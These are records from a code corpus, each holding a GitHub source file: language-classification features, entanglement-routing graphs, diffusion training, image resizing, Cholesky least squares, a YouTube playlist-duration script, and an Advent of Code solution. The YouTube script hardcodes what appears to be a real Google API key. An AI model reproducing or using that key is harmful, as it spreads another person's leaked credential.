file_train['Text'].str.replace(r'(.)\\1+', r'\\1\\1')\r\n \r\n #print(file_train['Text'])\r\n vector = TfidfVectorizer(analyzer='char')\r\n x = vector.fit_transform(file_train['Text'].values.astype('U')).toarray()\r\n for i,col in enumerate(vector.get_feature_names()):\r\n if (ord(col)>=97 and ord(col)<=122) or (ord(col)>=192 and ord(col)<=696):# or (ord(col)>=65 and ord(col)<=90):\r\n #print(col)\r\n file_train[col] = x[:, i]\r\n # self.alphabet_reference[col] = 0\r\n features = file_train.drop('Id',axis=1)\r\n features = features.drop('Text',axis = 1)\r\n #print(self.alphabet_reference)\r\n #print(features)\r\n features.to_csv('{0}_features.csv'.format(filename), sep=',', 
encoding='utf-8',index=False)\r\n \r\ndef commonFeatures(filename1,filename2):\r\n df1 = pd.read_csv('{0}.csv'.format(filename1), sep=',',header = 0)\r\n# print (df1.columns)\r\n df2 = pd.read_csv('{0}.csv'.format(filename2), sep=',',header = 0)\r\n# print (df2.columns)\r\n list1 = list(df1.columns)\r\n list2 = list(df2.columns)\r\n common = list(set(list1).intersection(list2))\r\n remove1 = list(set(list1).difference(common))\r\n remove2 = list(set(list2).difference(common))\r\n df1 = df1.drop(remove1,axis=1)\r\n df2 = df2.drop(remove2,axis=1)\r\n df1.to_csv('{0}.csv'.format(filename1), sep=',', encoding='utf-8',index = False)\r\n df2.to_csv('{0}.csv'.format(filename2), sep=',', encoding='utf-8',index = False)\r\n\r\ndef combine_xy_vectors(filename1,filename2):\r\n train_x = pd.read_csv('{0}.csv'.format(filename1), sep=',',header = 0)\r\n train_x = train_x.loc[:, ~train_x.columns.str.contains('^Unnamed')]\r\n train_y = pd.read_csv('{0}.csv'.format(filename2), sep=',',header = 0)\r\n train_y = train_y.loc[:, ~train_y.columns.str.contains('^Unnamed')]\r\n if(len(train_x)==len(train_y)):\r\n print(\"Merging x and y vectors according to the ids\")\r\n train_x['category'] = train_y.Category\r\n train_x.to_csv('trainingSet.csv', sep=',', encoding='utf-8', index = True)\r\n else:\r\n print(\"Vector lengths of x and y are not equal. Not possible to merger\")\r\n\r\ncreate = 0\r\n\r\ntrain = 'train_set_x'\r\ntest = 'test_set_x'\r\nif(create):\r\n #generate features for the training set \r\n generateFeatures(train)\r\n #generate features for the training set\r\n generateFeatures(test)\r\n #getting common features for making training set and test set in proper format\r\n #filename1 = train+'_features'\r\n #filename2 = test+'_features'\r\n commonFeatures(train+'_features',test+'_features')\r\n \r\nelse:\r\n print (\"Skipping generating features......\")\r\n\r\ncombine_xy_vectors(train+'_features','train_set_y')\r\n","repo_name":"Amarkr1/Language-Classification","sub_path":"generateFeatures.py","file_name":"generateFeatures.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72854079871","text":"import sys\nimport random\nimport math\nimport numpy as np\nimport networkx as nx\nfrom graphs import *\nfrom weights import *\nfrom algorithms import *\nfrom scipy.stats import powerlaw\n\n\ndef get_power_law(alpha,min_value,max_value):\n\tx = powerlaw.rvs(alpha, size=1)\n\treturn max_value - x[0]*(max_value-min_value)\n\ndef H2(p):\n\tif p == 0: \n\t\treturn 0\n\telse:\n\t#print(- p*math.log2(p) - (1-p)*math.log2(1-p))\n\t\treturn - p*math.log2(p) - (1-p)*math.log2(1-p)\n\ndef k(p):\n\treturn 1-H2(3*p/4)\n\ndef create_grid_from_file(filename,fid_min,prob_min,n_nodes,dist_t=\"uniform\"):\n\tt_mem_min = 100000\n\tt_mem_max = 1000000\n\n\ttime_min = 1\n\ttime_max = 100\n\n\tfid_min = fid_min\n\tfid_max = 1.0\n\n\tprob_min = prob_min\n\tprob_max = 1.0\n\tdist_type = random.uniform\n\n\n\n\tfile = open(\"../networks/\"+filename+\".txt\",\"r\")\n\tedges = file.readlines()\n\n\tG1 = Graph()\n\tG2 = nx.Graph()\n\tG3 = nx.Graph()\n \n\tfor i in range(0,n_nodes):\n\t\tt_mem = dist_type(t_mem_min,t_mem_max)\n\t\tprob_swap = dist_type(prob_min,prob_max)\n\t\tname = i\n\t\tG1.add_node(Node(name=name,neighbours={},prob_swap=prob_swap,t_mem=t_mem))\n\t\tG2.add_node(name)\n\t\tG3.add_node(name)\n\t\t#print(G1.nodes[name])\n\n\tfor edge in edges: \n\t\te = edge.strip().split(' ')\n\t\ts = int(e[0])\n\t\tt = 
int(e[1])\n\n\t\tfid = None\n\t\tif dist_t == \"uniform\":\n\t\t\tfid = dist_type(fid_min,fid_max)\n\t\telif dist_t == \"power_law\":\n\t\t\tfid = get_power_law(2,fid_min,fid_max)\n\t\ttime = dist_type(time_min,time_max)\n\t\tprob_gen = dist_type(prob_min,prob_max)\n\t\tlinka = Link(source=G1.nodes[s], target=G1.nodes[t], fid=fid, prob_gen=prob_gen, time=time)\n\t\t#print(linka)\n\t\tG1.add_link(linka)\n\t\t#G1.print()\n\t\tG2.add_edge(s,t)\n\t\tG3.add_edge(s,t,weight=Capacity(cap=prob_gen*k(1-fid),length=1))\n\n\treturn G1, G2, G3\n\ndef create_grid_from_file_simple(filename,probs,n_nodes):\n\tt_mem = math.inf\n\tprob_swap = 1.\n\ttime = 1\n\tfid = 1.\n\n\tfile = open(\"../networks/\"+filename+\".txt\",\"r\")\n\tedges = file.readlines()\n\n\tG1 = Graph()\n\tG2 = nx.Graph()\n\tG3 = nx.Graph()\n \n\tfor i in range(0,n_nodes):\n\t\t\n\t\tname = i\n\t\tG1.add_node(Node(name=name,neighbours={},prob_swap=prob_swap,t_mem=t_mem))\n\t\tG2.add_node(name)\n\t\tG3.add_node(name)\n\t\t#print(G1.nodes[name])\n\n\tfor edge in edges: \n\t\te = edge.strip().split(' ')\n\t\ts = int(e[0])\n\t\tt = int(e[1])\n\n\t\tprob_gen = random.sample(probs,1)[0]\n\t\tlinka = Link(source=G1.nodes[s], target=G1.nodes[t], fid=fid, prob_gen=prob_gen, time=time)\n\t\tG1.add_link(linka)\n\t\tG2.add_edge(s,t)\n\t\tG3.add_edge(s,t,weight=Capacity(cap=prob_gen*k(1-fid),length=1))\n\n\treturn G1, G2, G3\n\ndef compare_stars(graph,star1,star2,star3):\n\tstar_chosen_rate = None\n\tstar_chosen_fid = None\n\t\n\tstar_rate = 0\n\tstar_fid = 0\n\t#print(star1[0])\n\t#print(star2)\n\t#print(star3)\n\t#Finding optimal rate and optimal fidelity\n\tfor star in star1:\n\t\tif star.weight.rate > star_rate:\n\t\t\tstar_rate = star.weight.rate\n\t\t\tstar_chosen_rate = star\n\n\tfor star in star1:\n\t\tif star.weight.fid > star_fid:\n\t\t\tstar_fid = star.weight.fid\n\t\t\tstar_chosen_fid = star\n\n\tpoint = {\"n_nodes\" : len(graph.nodes),\n\t\t\t \"rate_shortest\" : 0,\n\t\t\t \"fid_shortest\" : 0,\n\t\t\t \"rate_bound\" : 0,\n\t\t\t \"fid_bound\" : 0,\n\t\t\t \"n_links\" : star2[\"dist\"],\n\t\t\t \"n_links_bound\" : sum([len(path) for path in star3[\"star\"]])-3,\n\t\t\t \"valid_shortest\" : True,\n\t\t\t \"valid_bound\" : True}\n\n\t# NO PATH CONNECTING NODES\n\tfor path in star2:\n\t\tif len(path) == 0:\n\t\t\tpoint[\"valid_shortest\"] = False\n\t\t\tpoint[\"valid_bound\"] = False\n\n\t\t\treturn point\n\n\tstar_rec_shortest = [reconstruct_path(graph,path) for path in star2[\"star\"]]\n\tstar_rec_bound = [reconstruct_path(graph,path) for path in star3[\"star\"]]\n\n\t\n\t# FOR A FAIR COMPARISON - remember we are excluding paths with fid < (4*0.5**(1/3)-1)/3\n\tfor path in star_rec_shortest:\n\t\tif path.weight.fid < (4*0.5**(1/3)-1)/3:\n\t\t\tpoint[\"valid_shortest\"] = False\n\n\tfor path in star_rec_bound:\n\t\tif path.weight.fid < (4*0.5**(1/3)-1)/3:\n\t\t\tpoint[\"valid_bound\"] = False\n\n\tif star_rate == 0 or star_fid == 0:\n\t\tpoint[\"valid_shortest\"] = False\n\t\tpoint[\"valid_bound\"] = False\n\n\tif point[\"valid_shortest\"]:\n\t\tstar_compare_shortest = reconstruct_star(graph,list_of_paths=star_rec_shortest)\n\t\tpoint[\"rate_shortest\"] = star_compare_shortest.weight.rate / star_rate\n\t\tpoint[\"fid_shortest\"] = star_compare_shortest.weight.fid / star_fid\n\n\tif point[\"valid_bound\"]:\n\t\tstar_compare_bound = reconstruct_star(graph,list_of_paths=star_rec_bound)\n\t\tpoint[\"rate_bound\"] = star_compare_bound.weight.rate / star_rate\n\t\tpoint[\"fid_bound\"] = star_compare_bound.weight.fid / star_fid\n\n\t\n\tif 
point[\"rate_shortest\"] > 1.0 or point[\"fid_shortest\"]>1.0 or point[\"rate_bound\"] > 1.0 or point[\"fid_bound\"]>1.0:\n\t\tprint(\"SOMETHING FUNNY IS GOING ON\")\n\t\tprint(\"BEST RATE STAR\")\n\t\tprint(star_chosen_rate)\n\t\tprint(\"BEST FID STAR\")\n\t\tprint(star_chosen_fid)\n\t\tprint(\"BEST DISTANCE STAR\")\n\t\tprint(star_compare)\n\t\tprint(star_compare.get_center_node().print_all_paths())\n\n\n\treturn point\n\n\n\n","repo_name":"luisbugalho/MultipartiteEntanglementRouting","sub_path":"python/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13448043157","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom modules import UNet\nfrom diffusion import Diffusion\nfrom utils import get_data\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nEMBED_DIM = 32\nIMG_HEIGHT = 208\nIMG_WIDTH = 176\n\nmodel_path = 'D:\\python fun projects\\machine learning\\models\\celebdiffusion218x178_48rf(good_old).pth'\ndata_path = 'D:\\python fun projects\\machine learning\\data'\n\nnum_epochs = 1000000\nbatch_size = 1\nlearning_rate = 1e-5\ncounter = 1000\n\ndef train():\n train_dataset, train_loader = get_data(IMG_HEIGHT, IMG_WIDTH, batch_size, data_path)\n\n model = UNet(EMBED_DIM, DEVICE).to(DEVICE)\n\n try:\n model.load_state_dict(torch.load(model_path))\n print('Model Loaded')\n except:\n print('No model found -> Creating new model')\n pass\n\n diffusion = Diffusion(IMG_HEIGHT, IMG_WIDTH, DEVICE)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n l1 = nn.L1Loss()\n n_total_steps = len(train_loader)\n T = 999\n train_size = len(train_dataset)\n\n #Mixed Precision\n scaler = torch.cuda.amp.GradScaler()\n\n for epoch in range(num_epochs):\n for step, images in enumerate(train_loader):\n #print(images.shape)\n images = images[0].cuda()\n #labels = labels.cuda()\n\n t = torch.randint(0, T, (batch_size if step < n_total_steps -1 else train_size - batch_size * step,), device=DEVICE).long()\n noised_images, noise = diffusion.add_noise(images, t)\n\n with torch.cuda.amp.autocast():\n predicted_noise = model(noised_images, t)\n loss = l1(noise, predicted_noise)\n\n optimizer.zero_grad()\n\n scaler.scale(loss).backward()\n\n scaler.step(optimizer)\n scaler.update()\n\n print(f\"\\rEpoch {epoch:04d} | step {step:08d} Loss: {loss.item():<10.4f} with t={t[0]:<10d}\", end='')\n\n if step % counter == 0: \n torch.save(model.state_dict(), model_path)\n print('')\n\ndef test():\n '''\n Uncomment these to test your model\n '''\n train_dataset, train_loader = get_data(IMG_HEIGHT, IMG_WIDTH, batch_size, data_path)\n\n model = UNet(EMBED_DIM, DEVICE).to(DEVICE)\n\n try:\n model.load_state_dict(torch.load(model_path))\n print('Model Loaded')\n except:\n print('No model found -> Creating new model')\n pass\n\n diffusion = Diffusion(IMG_HEIGHT, IMG_WIDTH, DEVICE)\n\n #diffusion.sample_random(model, T = 300, train_dataset=train_dataset)\n diffusion.sample_image(model, T=900)\n #diffusion.sample_image_multiple(model, T=900, num=10)\n #diffusion.sample_random_multiple(model, T=300, train_dataset=train_dataset)\n #diffusion.generate_images(model, T=900, rows=2, cols=2)\n #diffusion.sample_random_one_step(model, T=300, train_dataset=train_dataset)\n #diffusion.generate_images_one_step(model, T=900, rows=3, cols=3)\n #diffusion.compare_generate_images(model, T=900, rows=2, cols=2)\n \n\nif __name__ == '__main__':\n 
train()\n    #test()\n    ","repo_name":"dunglam2000vn/diffusion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"71897561791","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom PIL import Image\nimport re\n\nfiles = [f for f in os.listdir(\"supplier-data/images/\")]\nfor image in files:\n    # match only filenames ending in .tiff (dot escaped, match anchored)\n    image_pattern = r'\\w*\\.tiff$'\n    if re.match(image_pattern, image):\n        im = Image.open(\"supplier-data/images/\" + image)\n        print(image)\n        newname = image.split(\".\")\n        print(newname)\n        out600 = im.resize((600, 400))\n        outrgb = out600.convert('RGB')\n        outrgb.save(\"/home/student-02-fe81eaa9523b/supplier-data/images/\" + newname[0] + \".jpeg\", \"JPEG\")","repo_name":"kubusb/pythonOSgoogle","sub_path":"final_exam/week4_fruit/changeImage.py","file_name":"changeImage.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"71154175872","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tools import solve_lower_triangular, solve_upper_triangular\nnp.random.seed(42)\n\n\ndef cholesky(A):\n    # Performs a Cholesky factorization A = L*L^T of a matrix A.\n    n = A.shape[0]\n    L = np.array([[0.0] * n for i in range(n)])\n    for i in range(n):\n        for k in range(i+1):\n            tmp_sum = sum(L[i][j] * L[k][j] for j in range(k))\n            \n            if (i == k):\n                L[i][k] = np.sqrt(A[i][i] - tmp_sum)\n            else:\n                L[i][k] = (1.0 / L[k][k] * (A[i][k] - tmp_sum))\n    return L\n\n\ndef least_squares_cholesky(A, y):\n    # Solves the least squares problem Ax = y, for the x that minimizes ||Ax - y||_2, using Cholesky factorization.\n    R = cholesky(A.T@A)\n    RT = R.T\n    w = A.T@y\n    z = solve_lower_triangular(R, w)\n    x = solve_upper_triangular(RT, z)\n    return x","repo_name":"jgslunde/other_courses","sub_path":"MAT4110/oblig1/src/Cholesky.py","file_name":"Cholesky.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"34619190573","text":"#########################################################################\r\n###              Creator: Carlos Andres Mejias Mieses                 ###\r\n###              Date: 2021 12 27                                     ###\r\n###              Purpose: Create a script that automates CRUD.        ###\r\n###                                                                   ###\r\n###                                                                   ###\r\n###                                                                   ###\r\n#######################################################################\r\n\r\n#TODO: Change the design to OOP and automate upload.\r\n\r\n\r\napi_key = 'AIzaSyD0w7vp4wnt8D_RZJKddkNzuoRLHs4FV84'\r\napi_version = 'v3'\r\n\r\n\r\nimport os\r\nimport re\r\nimport pickle\r\nfrom datetime import timedelta\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\n\r\n#credentials = None\r\nscopes = dict()\r\nscopes['upload'] = 'https://www.googleapis.com/auth/youtube.upload'\r\nscopes['readonly'] = 'https://www.googleapis.com/auth/youtube.readonly'\r\nscopes['ssl']=['https://www.googleapis.com/auth/youtube.force-ssl']\r\n\r\n\r\n\r\n# #Definition of the authentication object.\r\n# flow = InstalledAppFlow.from_client_secrets_file('client_secrets.json', scopes=[scopes['readonly'], scopes['upload']])\r\n\r\n# #run the local server.\r\n# flow.run_local_server(port=8080, prompt='consent')\r\n\r\n#credentials = flow.credentials\r\n\r\n#def get_new_access_token():\r\n#Fetch a new access token once it expires.\r\ndef get_new_access_token():\r\n    credentials = None\r\n    # token.pickle stores the user's credentials from previously successful logins\r\n    if os.path.exists('token.pickle'):\r\n        print('Loading Credentials From File...')\r\n        with open('token.pickle', 'rb') as token:\r\n            credentials = pickle.load(token)\r\n\r\n    # If there are no valid credentials available, then either refresh the token or log in.\r\n    if not credentials or not credentials.valid:\r\n        if credentials and credentials.expired and credentials.refresh_token:\r\n            print('Refreshing Access Token...')\r\n            credentials.refresh(Request())\r\n        else:\r\n            print('Fetching New Tokens...')\r\n            flow = InstalledAppFlow.from_client_secrets_file(\r\n                'client_secrets.json',\r\n                scopes=[scopes['readonly'], scopes['upload']]\r\n            )\r\n            flow.run_local_server(port=8080, prompt='consent',\r\n                                  authorization_prompt_message='')\r\n            credentials = flow.credentials\r\n\r\n        # Save the credentials for the next run\r\n        with open('token.pickle', 'wb') as f:\r\n            print('Saving Credentials for Future Use...')\r\n            pickle.dump(credentials, f) \r\n    return credentials\r\n\r\n\r\ncredentials = get_new_access_token()\r\n\r\n\r\n\r\n\r\n\r\ndef get_playlist_time(credentials):\r\n    #Initialization of the YouTube API object.\r\n    youtube = build('youtube', 'v3', credentials=credentials)\r\n\r\n    #Regular expressions that parse the patterns that the \r\n    #API gives back.\r\n    hours_pattern = re.compile(r'(\\d+)H') #Grab the digits before H.\r\n    minutes_pattern = re.compile(r'(\\d+)M') #Grab the digits before M.\r\n    seconds_pattern = re.compile(r'(\\d+)S') #Grab the digits before S.\r\n\r\n    total_seconds = 0\r\n\r\n\r\n    nextPageToken = None\r\n    while True:\r\n        #request to receive the details of a playlist.\r\n        pl_request = youtube.playlistItems().list(\r\n            part='contentDetails',\r\n            playlistId='PLEsfXFp6DpzRMby_cSoWTFw8zaMdTEXgL',#'PL0-84-yl1fUnRuXGFe_F7qSH1LEnn9LkW',#'PL0glhsZ01I-AsN7PRMNWH9X9XJKVpGSWJ',#'PL-osiE80TeTvipOqomVEeZ1HRrcEvtZB_',#\"PL-osiE80TeTt2d9bfVyTiXJA-UTHn6WwU\",\r\n            maxResults=50,\r\n            pageToken=nextPageToken\r\n        )\r\n        #Save the results in a dict\r\n        pl_response = pl_request.execute()\r\n\r\n        vid_ids = []\r\n        for item in pl_response['items']: #look up the items key\r\n            vid_ids.append(item['contentDetails']['videoId'])#for each item append the video id and its details.\r\n\r\n        vid_request = youtube.videos().list(\r\n            part=\"contentDetails\",\r\n            id=','.join(vid_ids)\r\n        )\r\n\r\n        vid_response = vid_request.execute()\r\n\r\n        for item in vid_response['items']:\r\n            duration = item['contentDetails']['duration'] #for each item save the duration of each video.\r\n            #Take the duration string and split it into hours, minutes and seconds.\r\n            hours = hours_pattern.search(duration)\r\n            minutes = minutes_pattern.search(duration)\r\n            seconds = seconds_pattern.search(duration)\r\n            #Ternary expressions that convert the strings to ints so they can be summed, stored in hours/minutes/seconds.\r\n            hours = int(hours.group(1)) if hours else 0 #if there is a value in hours group them, else give 0 as default.\r\n            minutes = int(minutes.group(1)) if minutes else 0\r\n            seconds = int(seconds.group(1)) if seconds else 0\r\n            #Add up all the hours, minutes and seconds.\r\n            video_seconds = timedelta(\r\n                hours=hours,\r\n                minutes=minutes,\r\n                seconds=seconds\r\n            ).total_seconds() \r\n            #Sum the seconds\r\n            total_seconds += video_seconds\r\n        #the nextPage token returns the value of the next video in the playlist.\r\n        nextPageToken = pl_response.get('nextPageToken')\r\n        #if there are no more videos in the playlist, break out of the loop.\r\n        if not nextPageToken:\r\n            break\r\n\r\n    total_seconds = int(total_seconds)\r\n\r\n    minutes, seconds = divmod(total_seconds, 60)\r\n    hours, minutes = divmod(minutes, 60)\r\n\r\n    print(f'{hours}:{minutes}:{seconds}')\r\n\r\nget_playlist_time(credentials)\r\n\r\n\r\n\r\n# def upload_video(credentials):\r\n#     #Initialization of the YouTube API object.\r\n#     youtube = build('youtube', 'v3', credentials=credentials)\r\n\r\n# def upload_video():\r\n#     # token.pickle stores the user's credentials from previously successful logins\r\n#     if os.path.exists('token.pickle'):\r\n#         print('Loading Credentials From File...')\r\n#         with open('token.pickle', 'rb') as token:\r\n#             credentials = pickle.load(token)\r\n\r\n\r\n\r\n\r\n#     # If there are no valid credentials available, then either refresh the token or log in.\r\n#     if not credentials or not credentials.valid:\r\n#         if credentials and credentials.expired and credentials.refresh_token:\r\n#             print('Refreshing Access Token...')\r\n#             credentials.refresh(Request())\r\n#         else:\r\n#             print('Fetching New Tokens...')\r\n#             flow = InstalledAppFlow.from_client_secrets_file(\r\n#                 'client_secrets.json',\r\n#                 scopes=[\r\n#                     'https://www.googleapis.com/auth/youtube.readonly'\r\n#                 ]\r\n#             )\r\n\r\n#             flow.run_local_server(port=8080, prompt='consent',\r\n#                                   authorization_prompt_message='')\r\n#             credentials = flow.credentials\r\n\r\n#         # Save the credentials for the next run\r\n#         with open('token.pickle', 'wb') as f:\r\n#             print('Saving Credentials for Future Use...')\r\n#             pickle.dump(credentials, f) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# import argparse\r\n# import httplib2\r\n# import os\r\n# import random\r\n# import time\r\n\r\n# import google.oauth2.credentials\r\n# import google_auth_oauthlib.flow\r\n# from googleapiclient.discovery import build\r\n# from googleapiclient.errors import HttpError\r\n# from googleapiclient.http import MediaFileUpload\r\n# from google_auth_oauthlib.flow import InstalledAppFlow\r\n\r\n\r\n# # Explicitly tell the underlying HTTP transport library not to retry, since\r\n# # we are handling retry logic ourselves.\r\n# httplib2.RETRIES = 1\r\n\r\n# # Maximum number of times to retry before 
giving up.\r\n# MAX_RETRIES = 10\r\n\r\n# # Always retry when these exceptions are raised.\r\n# RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, httplib.NotConnected,\r\n# httplib.IncompleteRead, httplib.ImproperConnectionState,\r\n# httplib.CannotSendRequest, httplib.CannotSendHeader,\r\n# httplib.ResponseNotReady, httplib.BadStatusLine)\r\n\r\n# # Always retry when an apiclient.errors.HttpError with one of these status\r\n# # codes is raised.\r\n# RETRIABLE_STATUS_CODES = [500, 502, 503, 504]\r\n\r\n# # The CLIENT_SECRETS_FILE variable specifies the name of a file that contains\r\n# # the OAuth 2.0 information for this application, including its client_id and\r\n# # client_secret. You can acquire an OAuth 2.0 client ID and client secret from\r\n# # the {{ Google Cloud Console }} at\r\n# # {{ https://cloud.google.com/console }}.\r\n# # Please ensure that you have enabled the YouTube Data API for your project.\r\n# # For more information about using OAuth2 to access the YouTube Data API, see:\r\n# # https://developers.google.com/youtube/v3/guides/authentication\r\n# # For more information about the client_secrets.json file format, see:\r\n# # https://developers.google.com/api-client-library/python/guide/aaa_client_secrets\r\n# CLIENT_SECRETS_FILE = 'client_secret.json'\r\n\r\n# # This OAuth 2.0 access scope allows an application to upload files to the\r\n# # authenticated user's YouTube channel, but doesn't allow other types of access.\r\n# SCOPES = ['https://www.googleapis.com/auth/youtube.upload']\r\n# API_SERVICE_NAME = 'youtube'\r\n# API_VERSION = 'v3'\r\n\r\n# VALID_PRIVACY_STATUSES = ('public', 'private', 'unlisted')\r\n\r\n\r\n# # Authorize the request and store authorization credentials.\r\n# def get_authenticated_service():\r\n# flow = InstalledAppFlow.from_client_secrets_file(CLIENT_SECRETS_FILE, SCOPES)\r\n# credentials = flow.run_console()\r\n# return build(API_SERVICE_NAME, API_VERSION, credentials = credentials)\r\n\r\n# def initialize_upload(youtube, options):\r\n# tags = None\r\n# if options.keywords:\r\n# tags = options.keywords.split(',')\r\n\r\n# body=dict(\r\n# snippet=dict(\r\n# title=options.title,\r\n# description=options.description,\r\n# tags=tags,\r\n# categoryId=options.category\r\n# ),\r\n# status=dict(\r\n# privacyStatus=options.privacyStatus\r\n# )\r\n# )\r\n\r\n# # Call the API's videos.insert method to create and upload the video.\r\n# insert_request = youtube.videos().insert(\r\n# part=','.join(body.keys()),\r\n# body=body,\r\n# # The chunksize parameter specifies the size of each chunk of data, in\r\n# # bytes, that will be uploaded at a time. Set a higher value for\r\n# # reliable connections as fewer chunks lead to faster uploads. Set a lower\r\n# # value for better recovery on less reliable connections.\r\n# #\r\n# # Setting 'chunksize' equal to -1 in the code below means that the entire\r\n# # file will be uploaded in a single HTTP request. (If the upload fails,\r\n# # it will still be retried where it left off.) 
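(Editor's note: the resume-where-it-left-off behavior comes from resumable=True on the MediaFileUpload below, driven by the resumable_upload() retry loop.)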
This is usually a best\r\n# # practice, but if you're using Python older than 2.6 or if you're\r\n# # running on App Engine, you should set the chunksize to something like\r\n# # 1024 * 1024 (1 megabyte).\r\n# media_body=MediaFileUpload(options.file, chunksize=-1, resumable=True)\r\n# )\r\n\r\n# resumable_upload(insert_request)\r\n\r\n# # This method implements an exponential backoff strategy to resume a\r\n# # failed upload.\r\n# def resumable_upload(request):\r\n# response = None\r\n# error = None\r\n# retry = 0\r\n# while response is None:\r\n# try:\r\n# print('Uploading file...')\r\n# status, response = request.next_chunk()\r\n# if response is not None:\r\n# if 'id' in response:\r\n# print('Video id \"%s\" was successfully uploaded.') % response['id']\r\n# else:\r\n# exit('The upload failed with an unexpected response: %s' % response)\r\n# except HttpError, e:\r\n# if e.resp.status in RETRIABLE_STATUS_CODES:\r\n# error = 'A retriable HTTP error %d occurred:\\n%s' % (e.resp.status,\r\n# e.content)\r\n# else:\r\n# raise\r\n# except RETRIABLE_EXCEPTIONS, e:\r\n# error = 'A retriable error occurred: %s' % e\r\n\r\n# if error is not None:\r\n# print error\r\n# retry += 1\r\n# if retry > MAX_RETRIES:\r\n# exit('No longer attempting to retry.')\r\n\r\n# max_sleep = 2 ** retry\r\n# sleep_seconds = random.random() * max_sleep\r\n# print 'Sleeping %f seconds and then retrying...' % sleep_seconds\r\n# time.sleep(sleep_seconds)\r\n\r\n# if __name__ == '__main__':\r\n# parser = argparse.ArgumentParser()\r\n# parser.add_argument('--file', required=True, help='Video file to upload')\r\n# parser.add_argument('--title', help='Video title', default='Test Title')\r\n# parser.add_argument('--description', help='Video description',\r\n# default='Test Description')\r\n# parser.add_argument('--category', default='22',\r\n# help='Numeric video category. 
' +\r\n# 'See https://developers.google.com/youtube/v3/docs/videoCategories/list')\r\n# parser.add_argument('--keywords', help='Video keywords, comma separated',\r\n# default='')\r\n# parser.add_argument('--privacyStatus', choices=VALID_PRIVACY_STATUSES,\r\n# default='private', help='Video privacy status.')\r\n# args = parser.parse_args()\r\n\r\n# youtube = get_authenticated_service()\r\n\r\n# try:\r\n# initialize_upload(youtube, args)\r\n# except HttpError, e:\r\n# print 'An HTTP error %d occurred:\\n%s' % (e.resp.status, e.content)","repo_name":"carlosmmieses/Sm_Automation","sub_path":"yt_automation.py","file_name":"yt_automation.py","file_ext":"py","file_size_in_byte":13456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15534759547","text":"\ntds = \"\"\"\nmxmxvkd kfcds sqjhc nhms (contains dairy, fish)\ntrh fvjkl sbzzf mxmxvkd (contains dairy)\nsqjhc fvjkl (contains soy)\nsqjhc mxmxvkd sbzzf (contains fish)\"\"\"\n\ndef read_data(infile):\n rs = []\n for line in infile:\n line = line.strip().rstrip(\")\")\n line = line.replace(\",\",\"\")\n ings_s, algs_s = line.split(\"(contains \")\n rs.append((set(ings_s.split()), set(algs_s.split())))\n return rs\n\ndef possible_assignments(rules):\n all_algs = set.union(*[algs for (ings,algs) in rules])\n can_be = {}\n for alg in all_algs:\n can_be[alg] = set.intersection(*[ings for (ings,algs) in rules if alg in algs])\n return can_be\n\ndef part1(rules):\n can_be = possible_assignments(rules)\n all_used_ings = set.union(*can_be.values())\n sm = 0\n for (ings,algs) in rules:\n sm += sum(1 for i in ings if i not in all_used_ings)\n return sm\n\ntest_rules = read_data(tds.strip().splitlines())\nassert part1(test_rules) == 5\n\nwith open(\"input.txt\") as infile:\n rules = read_data(infile)\n#rules = read_data(inp)\nprint(\"PART1:\", part1(rules))\n#gc.collect()\n\n# immutable maps\ndef lookup(m, k):\n while m != None:\n (car,cdr) = m\n if car[0] == k:\n return car[1]\n m = cdr\n return None\n\ndef solve(rs, i, m):\n if i >= len(rs):\n return True, m\n\n (alg,ings) = rs[i]\n for ing in ings:\n if lookup(m, ing):\n continue\n\n ok,m2 = solve(rs, i+1, ((ing,alg), m))\n if ok:\n return True, m2\n return False, m\n\ndef part2(rules):\n rs = list(possible_assignments(rules).items())\n m = None\n ok, m = solve(rs, 0, m)\n assert ok\n # reverse m into a dict\n rm = {}\n while m != None:\n car,cdr = m\n rm[car[1]] = car[0]\n m = cdr\n return \",\".join(rm[k] for k in sorted(rm.keys()))\n\nassert part2(test_rules) == \"mxmxvkd,sqjhc,fvjkl\"\n\nprint(\"PART2:\", part2(rules))\n","repo_name":"MikeBeller/janet-cookbook","sub_path":"examples/advent/2020/21/2020-21.py","file_name":"2020-21.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"60"} +{"seq_id":"35988338702","text":"from nltk.stem.porter import PorterStemmer\nfrom collections import defaultdict\nfrom itertools import islice\nfrom urllib.parse import urldefrag\nimport math\nimport time\nimport re\n\nseek_dict = defaultdict(str)\n\n\"\"\"\nLoads seek_index.txt into memory as a dictionary of\nalphabetical positions of our index and its pointer position\n\"\"\"\ndef load_seek_dict():\n global seek_dict\n \n with open(\"seek_index.txt\") as f:\n for line in f:\n seek_dict[line[0]] = int(line[2:].strip())\n\n\"\"\"\nCalculates the dot product of 2 vectors\n\"\"\"\ndef cosine(q_vector, d_vector):\n dot_prod = 0\n \n for i in range(len(q_vector)):\n dot_prod 
